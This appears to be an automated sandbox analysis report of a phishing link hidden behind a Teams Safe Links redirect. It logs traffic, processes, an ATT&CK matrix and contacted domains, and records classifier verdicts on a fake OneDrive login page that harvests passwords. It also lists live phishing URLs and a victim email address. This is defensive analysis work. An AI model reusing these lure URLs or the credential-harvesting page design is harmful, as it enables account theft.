      Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
      Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.16:49724 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49725 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49727 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.16:49782 version: TLS 1.2
      Source: unknownProcess created: Commandline size = 2058
      Source: classification engineClassification label: mal68.phis.win@28/25@32/281
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 --field-trial-handle=1924,i,1149318911807237318,5933404608887014089,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://statics.teams.cdn.office.net/evergreen-assets/safelinks/1/atp-safelinks.html?url=https%3A%2F%2Fphpstack-1335745-4931432.cloudwaysapps.com%2F%23%26%26%2B~XanJlZEBwcm9hZy5jb20=&locale=en-us&dest=https%3A%2F%2Fteams.microsoft.com%2Fapi%2Fmt%2Fpart%2Famer-03%2Fbeta%2Fatpsafelinks%2Fgeturlreputationsitev2%2F&pc=dqIG3sYngZE8N2eRBkF7CAkOWKg5g3tGjnQGJGQlc61U8QGlKCs5AzH6JKtW7FyetS1g5oEXSNBKJVlJbTCgrea0O041dBSjafsPfOc5KxbMkQRnpwalZQdhHfcjoeWL7rzuDGG%252fj2e7scaAUTCy2PY0WmBb87rgNNPdmEQne%252f00jq9aOpwCvhJrGkNK5f8MP5jaUwccFhr9IIoVaCOrXUhSnuRv%252fw%252bxhUGpneOsAgBs7CjJQbmepBIHfEqwCkqvDbYbxYB4Hm9sLVAOFaz9VFMFSXPJt4MqeWAChikWLAZATmvniptR3h97WVF%252fZtjtm3RxdNyPROzhUvL92w9fdWmSw%252bHBxn5rMHOUpaQU16ZpcfATiVaU51fqKaYO2v4ZnK7axAavLgOpgAJivuE6JO2sqksPH41Z6PVam5c4J%252bwwz5Z2pqrOSxPxEcPGeDff%252bxp9PApNxpvURRLl98WzRw%252ftZEOu%252foKPhjN0OiTGAQDLRWTF%252bMCzSQg37tk7ZYUYYc0Ycs4xDjchhFprJCCSfrZ8WyHq6cjqmnbgDKRQig28xGNFnSDEeWMDBQeeeVyNqDv0FAAxkSAMO%252b7t4Qu1y0h0MHJYEb5pxfOYe8Pyfcsn7pyR%252fkKEqziEQVGlIETrpjVMNyrhJrnX9S%252flWaxf0H3tD%252fqMhzPysO9QdPSJTG054WE4jq5GRqTKu8P25t4KJLY15Oz2j5iCg7Bd5lczhgv4PQevplLuCGckM%252fs5EPk2r2FkSOxHF51EB5FR2TgXQR5UAp2BbaWTm9irKwSSUK5z1MsGMDokVMEB4bQ9mpZrl1%252bDMixJ1mQyyLXpelmEyN8zw1nTsbXAvDQgIvPLPj0QUtphEMnmVEXMkQHiw2WHWUSxIxYcY%252fltyp6bnMrankPAnpChbWQmk95rKsUz8tqtLjNDclK1y1FLy%252fh7sed9duxDDFupXnhmXxGJOmUV6FG1arxXL8urm1F98thG8anfchv3DafKsyVHHgmdUFNH6Uhcu4sB8fo0kqm2y7IWS96w5BeG334JvnFDJPLDPvtK5ojeXfDXh%252boKJdBxXGC9NmPwgDp8XeOavQnNlJRfUAXkhukdjDg1EHGF%252b9luUuTH%252fEbKHniTzx4OvIWUnDvXcdpuEIAnW8mDJzMXpmxpl3nwtTqeQWMeSNzjute9yTZEU%252beQk498EMyU%252fuPUg%252fSOH5r%252fwjGCsPpm%252f%252bUA00SsNvWuDD0AbNIKYubFuNKQ3SX6N7M11wOksoUG%252fz9IheWtOawwl7F0lqN3xkTQhfiiHovdudAPiB%252fzt25Im27XxPQ9s1c%252bnOWOPh6m%252bvaCQcj6bcwkFbNl5Y1KL7XQvirYSFsNXnrYuQvTPMk1n5CRq6dxsl9FRGV9MMdrZduC%252bG4B0zxLA58d8fTW2zfEXnRcMTgQKLK%252fmeZT7K3wwAvQiA%253d%253d%3B%20expires%3DWed%2C%2009%20Oct%202024%2014%3A05%3A23%20GMT%3B%20path%3D%2F%3B%20SameSite%3DNone%3B%20secu"
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 --field-trial-handle=1924,i,1149318911807237318,5933404608887014089,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity Information1
      Scripting
      Valid Accounts1
      Command and Scripting Interpreter
      1
      Scripting
      1
      Process Injection
      1
      Masquerading
      OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System2
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/Job1
      Registry Run Keys / Startup Folder
      1
      Registry Run Keys / Startup Folder
      1
      Process Injection
      LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
      Non-Application Layer Protocol
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
      Deobfuscate/Decode Files or Information
      Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
      Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      NameIPActiveMaliciousAntivirus DetectionReputation
      s3-w.us-east-1.amazonaws.com
      3.5.16.35
      truefalse
        unknown
        jsdelivr.map.fastly.net
        151.101.65.229
        truefalse
          unknown
          phpstack-1335745-4931432.cloudwaysapps.com
          138.197.99.28
          truefalse
            unknown
            code.jquery.com
            151.101.66.137
            truefalse
              unknown
              cdnjs.cloudflare.com
              104.17.25.14
              truefalse
                unknown
                challenges.cloudflare.com
                104.18.94.41
                truefalse
                  unknown
                  decoestilismoko.ru
                  104.21.51.55
                  truefalse
                    unknown
                    www.google.com
                    142.250.186.164
                    truefalse
                      unknown
                      s-0005.dual-s-msedge.net
                      52.123.129.14
                      truefalse
                        unknown
                        phpstack-1335745-4893982.cloudwaysapps.com
                        138.197.99.28
                        truefalse
                          unknown
                          cm-email-assets.s3.amazonaws.com
                          unknown
                          unknowntrue
                            unknown
                            cdn.jsdelivr.net
                            unknown
                            unknownfalse
                              unknown
                              NameMaliciousAntivirus DetectionReputation
                              https://cm-email-assets.s3.amazonaws.com/images/ContactMonkey-Team-RHgG2HKedjWK7A71P9queFFLgux8kwcr5DRYDP4VPcva96r5cgW6PiqHiSLkORIGILE6gqUD5FC44k37BcCvWgAPKXAcpJ1sJU3tF7IPivA1H7eCYe4LonxtUt60lylx/10.html#XanJlZEBwcm9hZy5jb20=true
                                unknown
                                https://cm-email-assets.s3.amazonaws.com/images/ContactMonkey-Team-RHgG2HKedjWK7A71P9queFFLgux8kwcr5DRYDP4VPcva96r5cgW6PiqHiSLkORIGILE6gqUD5FC44k37BcCvWgAPKXAcpJ1sJU3tF7IPivA1H7eCYe4LonxtUt60lylx/b+bdu++nua++wivprdd+m.html#&&+~XanJlZEBwcm9hZy5jb20=false
                                  unknown
                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs
                                  IPDomainCountryFlagASNASN NameMalicious
                                  142.250.186.46
                                  unknownUnited States
                                  15169GOOGLEUSfalse
                                  173.194.76.84
                                  unknownUnited States
                                  15169GOOGLEUSfalse
                                  104.18.94.41
                                  challenges.cloudflare.comUnited States
                                  13335CLOUDFLARENETUSfalse
                                  52.217.68.4
                                  unknownUnited States
                                  16509AMAZON-02USfalse
                                  52.123.129.14
                                  s-0005.dual-s-msedge.netUnited States
                                  8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                  151.101.130.137
                                  unknownUnited States
                                  54113FASTLYUSfalse
                                  172.217.23.99
                                  unknownUnited States
                                  15169GOOGLEUSfalse
                                  151.101.66.137
                                  code.jquery.comUnited States
                                  54113FASTLYUSfalse
                                  142.250.186.110
                                  unknownUnited States
                                  15169GOOGLEUSfalse
                                  3.5.16.35
                                  s3-w.us-east-1.amazonaws.comUnited States
                                  14618AMAZON-AESUSfalse
                                  104.17.24.14
                                  unknownUnited States
                                  13335CLOUDFLARENETUSfalse
                                  172.217.16.202
                                  unknownUnited States
                                  15169GOOGLEUSfalse
                                  1.1.1.1
                                  unknownAustralia
                                  13335CLOUDFLARENETUSfalse
                                  34.104.35.123
                                  unknownUnited States
                                  15169GOOGLEUSfalse
                                  216.58.212.131
                                  unknownUnited States
                                  15169GOOGLEUSfalse
                                  151.101.65.229
                                  jsdelivr.map.fastly.netUnited States
                                  54113FASTLYUSfalse
                                  104.18.95.41
                                  unknownUnited States
                                  13335CLOUDFLARENETUSfalse
                                  2.19.126.154
                                  unknownEuropean Union
                                  16625AKAMAI-ASUSfalse
                                  239.255.255.250
                                  unknownReserved
                                  unknownunknownfalse
                                  2.19.126.151
                                  unknownEuropean Union
                                  16625AKAMAI-ASUSfalse
                                  142.250.186.164
                                  www.google.comUnited States
                                  15169GOOGLEUSfalse
                                  104.21.51.55
                                  decoestilismoko.ruUnited States
                                  13335CLOUDFLARENETUSfalse
                                  138.197.99.28
                                  phpstack-1335745-4931432.cloudwaysapps.comUnited States
                                  14061DIGITALOCEAN-ASNUSfalse
                                  104.17.25.14
                                  cdnjs.cloudflare.comUnited States
                                  13335CLOUDFLARENETUSfalse
                                  IP
                                  192.168.2.17
                                  192.168.2.16
                                  192.168.2.5
                                  192.168.2.22
                                  Joe Sandbox version:41.0.0 Charoite
                                  Analysis ID:1528375
                                  Start date and time:2024-10-07 21:28:38 +02:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                  Sample URL:https://statics.teams.cdn.office.net/evergreen-assets/safelinks/1/atp-safelinks.html?url=https%3A%2F%2Fphpstack-1335745-4931432.cloudwaysapps.com%2F%23%26%26%2B~XanJlZEBwcm9hZy5jb20=&locale=en-us&dest=https%3A%2F%2Fteams.microsoft.com%2Fapi%2Fmt%2Fpart%2Famer-03%2Fbeta%2Fatpsafelinks%2Fgeturlreputationsitev2%2F&pc=dqIG3sYngZE8N2eRBkF7CAkOWKg5g3tGjnQGJGQlc61U8QGlKCs5AzH6JKtW7FyetS1g5oEXSNBKJVlJbTCgrea0O041dBSjafsPfOc5KxbMkQRnpwalZQdhHfcjoeWL7rzuDGG%252fj2e7scaAUTCy2PY0WmBb87rgNNPdmEQne%252f00jq9aOpwCvhJrGkNK5f8MP5jaUwccFhr9IIoVaCOrXUhSnuRv%252fw%252bxhUGpneOsAgBs7CjJQbmepBIHfEqwCkqvDbYbxYB4Hm9sLVAOFaz9VFMFSXPJt4MqeWAChikWLAZATmvniptR3h97WVF%252fZtjtm3RxdNyPROzhUvL92w9fdWmSw%252bHBxn5rMHOUpaQU16ZpcfATiVaU51fqKaYO2v4ZnK7axAavLgOpgAJivuE6JO2sqksPH41Z6PVam5c4J%252bwwz5Z2pqrOSxPxEcPGeDff%252bxp9PApNxpvURRLl98WzRw%252ftZEOu%252foKPhjN0OiTGAQDLRWTF%252bMCzSQg37tk7ZYUYYc0Ycs4xDjchhFprJCCSfrZ8WyHq6cjqmnbgDKRQig28xGNFnSDEeWMDBQeeeVyNqDv0FAAxkSAMO%252b7t4Qu1y0h0MHJYEb5pxfOYe8Pyfcsn7pyR%252fkKEqziEQVGlIETrpjVMNyrhJrnX9S%252flWaxf0H3tD%252fqMhzPysO9QdPSJTG054WE4jq5GRqTKu8P25t4KJLY15Oz2j5iCg7Bd5lczhgv4PQevplLuCGckM%252fs5EPk2r2FkSOxHF51EB5FR2TgXQR5UAp2BbaWTm9irKwSSUK5z1MsGMDokVMEB4bQ9mpZrl1%252bDMixJ1mQyyLXpelmEyN8zw1nTsbXAvDQgIvPLPj0QUtphEMnmVEXMkQHiw2WHWUSxIxYcY%252fltyp6bnMrankPAnpChbWQmk95rKsUz8tqtLjNDclK1y1FLy%252fh7sed9duxDDFupXnhmXxGJOmUV6FG1arxXL8urm1F98thG8anfchv3DafKsyVHHgmdUFNH6Uhcu4sB8fo0kqm2y7IWS96w5BeG334JvnFDJPLDPvtK5ojeXfDXh%252boKJdBxXGC9NmPwgDp8XeOavQnNlJRfUAXkhukdjDg1EHGF%252b9luUuTH%252fEbKHniTzx4OvIWUnDvXcdpuEIAnW8mDJzMXpmxpl3nwtTqeQWMeSNzjute9yTZEU%252beQk498EMyU%252fuPUg%252fSOH5r%252fwjGCsPpm%252f%252bUA00SsNvWuDD0AbNIKYubFuNKQ3SX6N7M11wOksoUG%252fz9IheWtOawwl7F0lqN3xkTQhfiiHovdudAPiB%252fzt25Im27XxPQ9s1c%252bnOWOPh6m%252bvaCQcj6bcwkFbNl5Y1KL7XQvirYSFsNXnrYuQvTPMk1n5CRq6dxsl9FRGV9MMdrZduC%252bG4B0zxLA58d8fTW2zfEXnRcMTgQKLK%252fmeZT7K3wwAvQiA%253d%253d%3B%20expires%3DWed%2C%2009%20Oct%202024%2014%3A05%3A23%20GMT%3B%20path%3D%2F%3B%20SameSite%3DNone%3B%20secu
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:13
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • EGA enabled
                                  Analysis Mode:stream
                                  Analysis stop reason:Timeout
                                  Detection:MAL
                                  Classification:mal68.phis.win@28/25@32/281
                                  • Exclude process from analysis (whitelisted): svchost.exe
                                  • Excluded IPs from analysis (whitelisted): 216.58.212.131, 142.250.186.46, 173.194.76.84, 2.19.126.151, 2.19.126.154, 34.104.35.123
                                  • Not all processes where analyzed, report is missing behavior information
                                  • VT rate limit hit for: https://statics.teams.cdn.office.net/evergreen-assets/safelinks/1/atp-safelinks.html?url=https%3A%2F%2Fphpstack-1335745-4931432.cloudwaysapps.com%2F%23%26%26%2B~XanJlZEBwcm9hZy5jb20=&locale=en-us&dest=https%3A%2F%2Fteams.microsoft.com%2Fapi%2Fmt%2Fpart%2Famer-03%2Fbeta%2Fatpsafelinks%2Fgeturlreputationsitev2%2F&pc=dqIG3sYngZE8N2eRBkF7CAkOWKg5g3tGjnQGJGQlc61U8QGlKCs5AzH6JKtW7FyetS1g5oEXSNBKJVlJbTCgrea0O041dBSjafsPfOc5KxbMkQRnpwalZQdhHfcjoeWL7rzuDGG%252fj2e7scaAUTCy2PY0WmBb87rgNNPdmEQne%252f00jq9aOpwCvhJrGkNK5f8MP5jaUwccFhr9IIoVaCOrXUhSnuRv%252fw%252bxhUGpneOsAgBs7CjJQbmepBIHfEqwCkqvDbYbxYB4Hm9sLVAOFaz9VFMFSXPJt4MqeWAChikWLAZATmvniptR3h97WVF%252fZtjtm3RxdNyPROzhUvL92w9fdWmSw%252bHBxn5rMHOUpaQU16ZpcfATiVaU51fqKaYO2v4ZnK7axAavLgOpgAJivuE6JO2sqksPH41Z6PVam5c4J%252bwwz5Z2pqrOSxPxEcPGeDff%252bxp9PApNxpvURRLl98WzRw%252ftZEOu%252foKPhjN0OiTGAQDLRWTF%252bMCzSQg37tk7ZYUYYc0Ycs4xDjchhFprJCCSfrZ8WyHq6cjqmnbgDKRQig28xGNFnSDEeWMDBQeeeVyNqDv0FAAxkSAMO%252b7t4Qu1y0h0MHJYEb5pxfOYe8Pyfcsn7pyR%252fkKEqziE
                                  InputOutput
                                  URL: https://statics.teams.cdn.office.net/evergreen-assets/safelinks/1/atp-safelinks.html Model: jbxai
                                  {
                                  "brand":[],
                                  "contains_trigger_text":false,
                                  "trigger_text":"",
                                  "prominent_button_name":"unknown",
                                  "text_input_field_labels":"unknown",
                                  "pdf_icon_visible":false,
                                  "has_visible_captcha":false,
                                  "has_urgent_text":false,
                                  "text":"Verifying link.",
                                  "has_visible_qrcode":false}
                                  URL: https://statics.teams.cdn.office.net/evergreen-assets/safelinks/1/atp-safelinks.html Model: jbxai
                                  {
                                  "brand":[],
                                  "contains_trigger_text":false,
                                  "trigger_text":"",
                                  "prominent_button_name":"Skip verification",
                                  "text_input_field_labels":"unknown",
                                  "pdf_icon_visible":false,
                                  "has_visible_captcha":false,
                                  "has_urgent_text":false,
                                  "text":"We can't check the safety of this website right now.",
                                  "has_visible_qrcode":false}
                                  URL: https://cm-email-assets.s3.amazonaws.com/images/ContactMonkey-Team-RHgG2HKedjWK7A71P9queFFLgux8kwcr5DRYDP4VPcva96r5cgW6PiqHiSLkORIGILE6gqUD5FC44k37BcCvWgAPKXAcpJ1sJU3tF7IPivA1H7eCYe4LonxtUt60lylx/b+bdu++nua++wivprdd+m.html#&&+~XanJlZEBwcm9hZy5jb20= Model: jbxai
                                  {
                                  "brand":[],
                                  "contains_trigger_text":false,
                                  "trigger_text":"",
                                  "prominent_button_name":"unknown",
                                  "text_input_field_labels":"unknown",
                                  "pdf_icon_visible":false,
                                  "has_visible_captcha":false,
                                  "has_urgent_text":false,
                                  "text":"Running device security check...",
                                  "has_visible_qrcode":false}
                                  URL: https://cm-email-assets.s3.amazonaws.com/images/ContactMonkey-Team-RHgG2HKedjWK7A71P9queFFLgux8kwcr5DRYDP4VPcva96r5cgW6PiqHiSLkORIGILE6gqUD5FC44k37BcCvWgAPKXAcpJ1sJU3tF7IPivA1H7eCYe4LonxtUt60lylx/10.html#XanJlZEBwcm9hZy5jb20= Model: jbxai
                                  {
                                  "brand":["OneDrive"],
                                  "contains_trigger_text":true,
                                  "trigger_text":"Sign in",
                                  "prominent_button_name":"Next",
                                  "text_input_field_labels":["jred@proag.com"],
                                  "pdf_icon_visible":false,
                                  "has_visible_captcha":false,
                                  "has_urgent_text":false,
                                  "text":"For you",
                                  "has_visible_qrcode":false}
                                  URL: https://cm-email-assets.s3.amazonaws.com/images/ContactMonkey-Team-RHgG2HKedjWK7A71P9queFFLgux8kwcr5DRYDP4VPcva96r5cgW6PiqHiSLkORIGILE6gqUD5FC44k37BcCvWgAPKXAcpJ1sJU3tF7IPivA1H7eCYe4LonxtUt60lylx/10.html#XanJlZEBwcm9hZy5jb20= Model: jbxai
                                  {
                                  "phishing_score":7,
                                  "brands":"OneDrive",
                                  "legit_domain":"onedrive.com",
                                  "classification":"wellknown",
                                  "reasons":["The brand 'OneDrive' is a well-known cloud storage service by Microsoft.",
                                  "The URL 'cm-email-assets.s3.amazonaws.com' is hosted on Amazon S3,
                                   which is a legitimate cloud service provider.",
                                  "The domain does not match the legitimate domain for OneDrive,
                                   which is 'onedrive.com'.",
                                  "The use of Amazon S3 could indicate a legitimate use case for hosting assets,
                                   but it could also be used for phishing if the content is misleading.",
                                  "There is no direct association between the URL and the OneDrive brand,
                                   which raises suspicion.",
                                  "The email input field 'jred@proag.com' does not provide any direct indication of phishing but could be used to collect user information."],
                                  "brand_matches":[false],
                                  "url_match":true,
                                  "brand_input":"OneDrive",
                                  "input_fields":"jred@proag.com"}
                                  URL: https://cm-email-assets.s3.amazonaws.com/images/ContactMonkey-Team-RHgG2HKedjWK7A71P9queFFLgux8kwcr5DRYDP4VPcva96r5cgW6PiqHiSLkORIGILE6gqUD5FC44k37BcCvWgAPKXAcpJ1sJU3tF7IPivA1H7eCYe4LonxtUt60lylx/10.html#XanJlZEBwcm9hZy5jb20= Model: jbxai
                                  {
                                  "brand":["OneDrive"],
                                  "contains_trigger_text":true,
                                  "trigger_text":"Enter password",
                                  "prominent_button_name":"Sign in",
                                  "text_input_field_labels":["Password"],
                                  "pdf_icon_visible":false,
                                  "has_visible_captcha":false,
                                  "has_urgent_text":false,
                                  "text":"For you",
                                  "has_visible_qrcode":false}
                                  URL: https://cm-email-assets.s3.amazonaws.com/images/ContactMonkey-Team-RHgG2HKedjWK7A71P9queFFLgux8kwcr5DRYDP4VPcva96r5cgW6PiqHiSLkORIGILE6gqUD5FC44k37BcCvWgAPKXAcpJ1sJU3tF7IPivA1H7eCYe4LonxtUt60lylx/10.html#XanJlZEBwcm9hZy5jb20= Model: jbxai
                                  {
                                  "phishing_score":9,
                                  "brands":"OneDrive",
                                  "legit_domain":"onedrive.com",
                                  "classification":"wellknown",
                                  "reasons":["The brand 'OneDrive' is a well-known cloud storage service by Microsoft.",
                                  "The legitimate domain for OneDrive is 'onedrive.com'.",
                                  "The URL 'cm-email-assets.s3.amazonaws.com' is hosted on Amazon S3,
                                   which is a cloud storage service.",
                                  "Amazon S3 is often used to host assets for various services,
                                   but it is not the legitimate domain for OneDrive.",
                                  "The presence of a password input field on a non-legitimate domain is suspicious and indicative of a phishing attempt.",
                                  "The URL does not match the legitimate domain for OneDrive and could be used to deceive users into entering sensitive information."],
                                  "brand_matches":[false],
                                  "url_match":true,
                                  "brand_input":"OneDrive",
                                  "input_fields":"Password"}
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Oct 7 18:29:06 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                  Category:dropped
                                  Size (bytes):2673
                                  Entropy (8bit):3.984841078315027
                                  Encrypted:false
                                  SSDEEP:
                                  MD5:5E0DA8662F4457A04DDBD5B67687685C
                                  SHA1:F94301C9B5D6505A69C0EF5E594C2E5B012E4007
                                  SHA-256:571D4EFF4A3C32A1D1808807E8E96A8C0C5B52490FF1F817401E6E51524C26E9
                                  SHA-512:92D839B3CC4CFF82BD83F33B4961F6288FC703249D181B2F014334B7544B5E60C0608064A8E8437E0E3EB88EED8BCC73EB0F0C6690DF126030C3E966A5AD209E
                                  Malicious:false
                                  Reputation:unknown
                                  Preview:L..................F.@.. ...$+.,.....;.,....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IGY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VGY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VGY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VGY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VGY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........1e......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Oct 7 18:29:06 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                  Category:dropped
                                  Size (bytes):2675
                                  Entropy (8bit):3.9995641654296756
                                  Encrypted:false
                                  SSDEEP:
                                  MD5:938ACE0435D7F00CC887C95C943D7D6E
                                  SHA1:D2BEBA6C2E4899703FA25DB8A6DF83DEBF17CB70
                                  SHA-256:941B4C8DA7E29E7DD709D2C82E065A4486D9D5ABD13F35040BEF526235DABCA1
                                  SHA-512:3034C48F3111E925537DA88F551967DAF56F86A4FC382287119691A90931C8F5485AD3919BF4C30BCB997A48887EBA6E4A0C5BCC6CACD9BB51DE60F14305B287
                                  Malicious:false
                                  Reputation:unknown
